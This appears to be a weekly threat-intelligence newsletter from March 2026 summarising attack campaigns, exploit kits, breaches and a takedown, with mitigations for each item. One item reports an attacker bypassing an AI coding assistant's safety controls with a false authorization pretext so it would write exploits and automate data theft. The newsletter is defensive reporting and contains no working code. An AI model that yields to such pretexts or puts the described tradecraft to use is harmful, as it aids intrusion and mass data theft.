Threat Newsletter March 9, 2026
This week's threat intel newsletter covers AI-enabled attacks, mobile exploits, infrastructure vulnerabilities, law enforcement disruptions, and cloud security incidents. Key topics include attackers using Claude Code to automate exploits against Mexican government systems, North Korea's APT37 weaponizing USB drives to breach air-gapped networks, a sophisticated iOS exploit kit (Coruna) spreading across threat actor groups, Europol's takedown of Tycoon 2FA phishing infrastructure, Google's analysis of 90 zero-days exploited in 2025, Iran's MuddyWater expanding U.S. operations, and a Google Cloud API key compromise resulting in $82K in unauthorized charges.
“Living Off the AI”: Claude Code Used to Build Exploits and Automate Exfiltration
Security researchers at Gambit Security report that attackers abused Anthropic’s Claude Code during a cyber attack campaign targeting Mexican government systems.
Key Takeaways:
⚠️Impact: The intrusions reportedly began with Mexico’s tax authority in late December 2025 and expanded to 10 government bodies plus a financial institution.
❗Attack: Base on the attacker logs, the threat actor sent 1,000+ prompts to Claude Code to help drive the operation, using the assistant to write exploits, build tooling, and automate data theft. The campaign resulted in 150GB of data exfiltrated and potential exposure to 195 million identities, including civil registry, tax, and voter-related data.
🔧 AI as force multiplier in practice: The assistant was used across the kill chain, not just for idea generation, but for exploit development, tool creation, and operational automation.
💡 Guardrail evasion: The attacker allegedly social-engineered authorization context to bypass safety controls and keep the model assisting.
🛡️ Mitigation: Treat this as an "ops acceleration" threat—harden identity and remote access, lock down egress, and detect bulk exfiltration behavior.
Pierluigi Paganini
Ruby Jumper: APT37 Toolkit Turns USB Drives Into Covert C2 for Air-Gapped Targets
Zscaler reports a North Korea-linked threat actor, APT37 (aka ScarCruft), is using a new malware toolkit in a campaign dubbed “Rudy Jumper” to move data and commands between internet-connected systems and air-gapped machines.
Key Takeaways
🚨 Air -gapped does not mean safe: They are using USB drives to carry commands in and data out.
🪲 Malicious Toolkit: Researches at Zscaler analyzed the malware employed in APT37’s Rudy Jumper campaign and identified a toolkit of five malicious tools: RESTLEAF, SNAKEDROPPER, THUMBSBD, VIRUSTASK, and FOOTWINE.
⚠️Initial infection: A user opens a LNK file, which triggers PowerShell, then installs a Ruby-based loader and additional components that weaponize USB drives to act like a covert relay for command-and-control and exfiltration.
👊USB becomes “covert C2”: The THUMBSBD component hides data in hidden folders on removable media, turning USB into a bidirectional relay between networks.
🛡️ Mitigation: Lock down removable media by disabling or allow-listing USB storage, scanning all drives on a controlled transfer workstation, and blocking LNK-to-PowerShell execution paths to prevent USB-based air-gap bridging.
SEONGSU PARK - Staff Threat Researcher
Chrome Plans Quantum-Resistant HTTPS With Merkle Tree Certificates
Google is developing a new approach to HTTPS certificates in Chrome called Merkle Tree Certifications (MTCs) to prepare the web for post-quantum cryptography without making TLS handshakes significantly larger or slower.
Key Takeaways
❗Goal: Make HTTPS more quantum-resistant while keeping performance similar to today’s TLS.
💡Why change certificates: Post-quantum algorithms can increase handshake size; MTCs aim to avoid the bandwidth bloat of traditional certificate chains.
🔧 How it works: A CA signs one Merkle tree “head” covering potentially millions of certs, and browsers verify sites using a small proof of inclusion rather than a full chain.
💭 Chrome Direction: Google says Chrome has no immediate plan to add “traditional” X.509 cert chains containing post-quantum crypto to the Chrome Root Store; MTCs are the preferred path.
📈 Timeline: Testing now, broader ecosystem bootstrapping in Q1 2027, and a more complete program/root store approach targeted for Q3 2027.
The Hacker News
OpenClaw “ClawJacked” Bug Lets Any Website Hijack a Local AI Agent
Oasis Security discovered a high-severity vulnerability chain in OpenClaw (”ClawJacked”) where any website a developer visits could silently connect to the local OpenClaw gateway on localhost, brute-force the gateway password, auto-register a trusted device, and then take full control of an agent.
🌐 Impact: A malicious website could achieve full agent takeover with no plugins, extensions, or user prompts.
⚠️ Core issue: Browsers can open WebSocker connections to localhost, and OpenClaw trusted localhost too much.
💡What made it practical: No effective password rate limiting on localhost, enabling a fast brute force from JavaScript.
❗Why it matters: OpenClaw often has high-value access such as Slack, calendars, dev tools, credentials, so takeover can look like workstation-level compromise.
🛠️ Fix: Update OpenClaw to 2026.2.25 or later and review what access/credentials agents have been granted.
The Oasis Research Team
LexisNexis Breach Confirmed Following Data Leak and Failed Extortion Attempt
LexisNexis confirmed a data breach after attackers leaked files they claim were stolen from the company’s system. LexisNexis says the incident is contained and that there is no evidence its products and services were impacted, but acknowledged exposure of certain customer and support-related information.
Key Takeaways
🚨 Confirmed Breach/ Data Leak: The incident was validated after hackers posted/leaked files and attempted extortion.
💡LexisNexis downplay the scope: The company says the affected servers mostly contained older, legacy data and the mater is contained.
🔍 What data was exposed: Customer names, user IDs, business contact details, IPs of customer survey respondents, and support tickets.
❗Attacker claim: 25GB stolen and 400,000 personal records, including some .gov-associated identities; claimed.
Bill Toulas
“Harvest Now, Decrypt Later”: Why You Need a Post-Quantum Crypto Plan Now
This article argues that organizations should start post-quantum cryptography (PQC) planning now because attackers can steal encrypted data today and decrypt it later when quantum computers are strong enough.
Key Takeaways
❗The threat is already active: Adversaries can collect encrypted traffic/data now and wit to decrypt it later.
💡 Long-lived data is the priority: Anything that must remain confidential for many years is most at risk.
🔧 Start with inventory: Build a cryptographic asset inventory (where encryption is used , what algorithms, what key sizes, what vendors).
📈 Hybrid + crypto agility are key: Expect a transition period where you run hybrid cryptography and design for algorithm agility so you can swap primitives as standards mature.
The Hacker News
Thousands of Honeywell IQ4 Controllers Found Internet-Exposed Amid Vulnerability Dispute
A security researcher (Gjoko Kristic) reports a high-risk issue affecting Honeywell’s IQ4 building management controller, claiming the web-based management interface (HMI) can be exposed without authentication in factory-default or misconfiguration setups.
Key Takeaways
❗Core risk: IQ4 controllers may be internet-exposed, with claims that some HMIs are reachable without login.
🔒Misconfiguration window matters: The researcher says an attacker could create an admin account during setup if a module is not enabled, potentially locking out operators.
🗣️Dispute: Honeywell says there is no operational impact in the described state and no patch is planned because it’s meant to be installed securely and not exposed to the internet.
🌐 Exposure: The researcher claims 7,500 IQ4 instances are internet-exposed and estimates 20% may be accessible without authentication.
AnuPriya
Coruna iOS Exploit Kit: Five Chains, 23 Exploits, and Rapid Threat Actor Proliferation
Google Threat Intelligence Group (GTIG) details Coruna, a sophisticated iOS exploit kit that targeted iPhones running iOS 13.0 through 17.2.1. The kit includes five full exploit chains and 23 total exploits, and was observed “proliferating” across multiple threat actors and use cases: first in highly targeted surveillance-style operations, later in watering hole attacks against Ukrainian users (linked to a suspected Russian espionage cluster), and eventually in broad-scale campaigns by a China-based financially motivated actor using scam sites.
Key Takeaways
❗Big capability bundle: Coruna is a “full kit” (multiple chains + many exploits), not a single iOS bug.
🚨 Wide iOS coverage: Targets a long span of versions (iOS 13 → 17.2.1), increasing the pool of vulnerable devices.
🔍Delivery Patterns: Web-based exploitation via injected/hidden content (iframes), with fingerprinting to match the right iPhone/iOS exploit chain.
💡Post- exploitation focus shifted to theft: The observed end payload included modules aimed at stealing finical/crypto-wallet data (not just classic surveillance).
🛡️ Defense: Update iOS to the latest version. If you cannot, enable Lockdown Mode to reduce exploitation risk.
Operation Shuts Down Tycoon 2FA PhaaS, Linked to Massive MFA Bypass Campaigns
A Europol-lead coalition of law enforcement and privet-sector partners dismantled “Tycoon 2FA”, a major phishing-as-a-service (PhaaS) operation used for adversary-in-the-middle (AiTM) attacks that steal credentials and MFA codes/session cookies to enable account takeover.
Key Takeaways
🎉 Big disruption: Law enforcement and partners took down Tycoon 2FA infrastructure, including 330 domains.
❗Why it mattered: Tycoon 2FA enabled AiTM phishing that can bypass MFA in practice by stealing session cookies/tokens, not just passwords.
🌐 Scale: The kit was tied to 64,000 + phishing incidents and tens of millions of phishing emails per month.
🎯 Enterprise-focused: Targeting was largely business environments (enterprise-managed accounts, paid domains), spanning many sectors like healthcare, education, finance, and government.
🛡️ Defender-reminder: Password resets alone may not be enough after AiTM phishing. Organizations often need to revoke sessions/tokens to fully cut off access.
The Hacker News
Google: 90 Zero-Days Exploited in 2025, Nearly Half Targeted Enterprise Tech
Google Threat Intelligence Group (GTIG) reviewed 90 zero-day vulnerabilities exploited in-the-wild in 2025. The key trend is a continued shift toward enterprise and perimeter/edge technologies as primary targets, while browser exploitation dropped and operating system exploitation increased.
Key Takeaways
❗90 zero-days in 2025: Higher than 2024 which GTIG discovered 78 zero-days.
⚠️ Enterprise exploitation hit a high: 43 zero0days (48%) impacted enterprise technologies, including security and networking appliances.
🎯 Edge devices remain prime initial access: Espionage groups heavily target security appliances and perimeter devices, which often hard to monitor and lack EDR visibility.
💡Browser down, OS up: Browser zero-days fell to historical lows, while OS vulnerabilities made up the largest slice of exploitation as GTIG cited 39 OS zero-days.
🥷 PRC-linked espionage still dominates state use: PRC-nexus groups remained the most prolific state users, with a strong focus on edge/security devices.
🔍 Money-motivated zero days rebounded: GTIG attributed 9 zero-days to financially motivated groups in 2025.
Iran’s MuddyWater Expands U.S. Targeting Amid Conflict, Deploys New Backdoor
Researchers from Symantec and Carbon Black report that the Iran-linked threat group MuddyWater (Seedworm), assessed to be affiliated with Iran’s MOIS, has been found operating in multiple U.S. organizations (including banks, an airport, and non-profits).
Key Takeaways
🥷APT: MuddyWater (Seedworm) has been active in multiple U.S organizations such as banks, airport, nonprofits, and an Israel-based operation of a software company tied to defense/aerospace supply chains.
🪲New Backdoor: The group seems to be deploying a new backdoor called “Dindoor” that uses the Deno JavaScript runtime, and a separate Python backdoor (”Fakeset”) in other environments.
🛡️ Defender Focus: The group do credential theft, password spraying, and social engineering as repeatable access methods, then persistence via common enterprise services. Organizations need to prioritize phishing-resistant MFA, reduce internet exposure, and tighten monitoring around identity and cloud control planes.
The Hacker News
ClickFix Evolves: Windows Terminal Now the Social-Engineering Execution Path
A newer wave of ClickFix social-engineering attacks is pushing victims to open Windows Terminal (wt.exe) and paste a command copied to the clipboard by a malicious webpage. That command runs PowerShell in-memory, pulls down additional stages, and ultimately deploys Lumma Stealer to steal browser credentials and data. The shift to Windows Terminal helps the activity look more “normal” and may evade detection tuned to Win+R / Run dialog abuse.
Key Takeaways
❗It is not a software: It is user-driven execution, so patching does not “fix” it.
🚨 Attack: Fake CAPTCHA or “verification” pages pressure users to paste a command into the terminal.
🔍 New behavior to watch: PowerShell spawned from wt.exe (Windows Terminal) and suspicious clipboard-driven command execution.
🚚 Delivery: Threat actors deliver Lumma Stealer and steal browser credentials from Chrome and Edge.
🛡️ Defense: Train users to never paste commands from websites, restrict Terminal and PowerShell to admin workflows where possible, and alert on unusual scheduled tasks and persistence paths.
Tushar Subhra Dutta
China-Nexus UAT-9244 Targets Telecoms With New Multi-Platform Malware Toolkit
A China-aligned APT cluster (UAT-9244) has been targeting telecommunication providers in South America since 2024. The campaign uses a purpose-built toolkit with three implants to maintain access across Windows, Linux, and network edge devices, enabling long-term intrusion and lateral expansion inside telecom infrastructure.
Key Takeaways
🎯 Target focus: The threat actors are targeting Telecom providers and the critical routing/management edge devices they rely on.
🪲Three-tool toolkit (different roles):
- TernDoor: Windows backdoor and CrowDoor variant lineage.
- PeerTime: Linux backdoor using BitTorrent for C2, helping traffic blend with normal P2P patterns.
- BruteEntry: Turns compromised edge devices into ORBs (Operational Relay Boxes) used to brute-force SSH, Postgre SQL, and Tomcat targets to expand access.
💡Notable Tradecraft (Windows Side): DLL side-loading, in-memory shellcode execution, injection into msiexec.exe, persistence via scheduled tasks + Run keys, and a driver used to manipulate processes (potentially to pressures security tooling.
🛡️Defender focus: Hunt for DLL side-loading patterns, anomalous scheduled tasks/Run keys, unusual driver installs, Bit Torrent-like traffic from servers that should not be using it, and brute-force behavior originating from edge devices acting as relays.
Tushar Subhra Dutta
Gemini API Key Compromise Turns a $180 Month Into an $82K Incident
A small development team had a Google Cloud API key stolen and abused to call high-cost Gemini endpoints, which drove $82,314.44 in unauthorized usage charges in about 48 hours.
Key Takeaways
🚨 This is a cost-exhaustion attack: attackers do not need to steal data to cause major harm; they can just burn API credits at scale.
💥 Blast radius comes from defaults: if API keys are left “unrestricted,” old/exposed keys can become powerful when new services (like Gemini) are enabled.
🔧 Guardrails to set now (practical):
- Billing budgets with alerts and automated enforcement at a cap.
- Restrict keys to specific APIs and limit by IP/referrer.
- Tight quota caps (RPM/RPD) aligned to real usage.
- Prefer short-lived credentials (service accounts / workload identity) over long-lived keys.
🔍 Detectability: watch for sudden spend spikes, unexpected endpoint usage (Gemini models you do not use), and anomalous geography or request volume.
💡 Incident response note**:** deleting/rotating the key is necessary but may not reverse billing; documentation (logs, evidence of compromise, reports) can matter in disputes.
Abinaya
